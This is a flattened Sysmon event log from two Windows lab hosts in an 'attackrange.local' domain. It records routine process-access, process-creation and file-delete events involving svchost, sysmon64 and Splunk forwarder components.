09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979339Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979338Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979337Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979336Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979335Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979334Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979333Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.384{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B72-6151-D679-00000000FD01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979332Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.385{69CF5F33-8B72-6151-D679-00000000FD01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979331Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.384{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC30110264A8F247AEF2199F9DE14590,SHA256=9EB6B056412F1434D2376E0AB490019D2158629C3F68C9C407549106262054BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979373Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.915{69CF5F33-8B73-6151-D879-00000000FD01}2696216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979372Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.775{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B73-6151-D879-00000000FD01}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979371Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.775{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979370Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.775{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979369Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.775{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979368Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.775{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979367Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.775{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979366Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.759{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979365Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.759{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979364Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.759{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979363Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.759{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979362Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.759{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8B73-6151-D879-00000000FD01}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979361Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.759{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B73-6151-D879-00000000FD01}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979360Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.760{69CF5F33-8B73-6151-D879-00000000FD01}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:27.697{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D16C090595B8ADB12C6FF1B3A1734B9,SHA256=0BE0A82319BC7E787B6742E3A170D854C51C726A8AC2270AD319F7579D17D087,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979359Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B73-6151-D779-00000000FD01}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979358Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:27.087{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979357Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 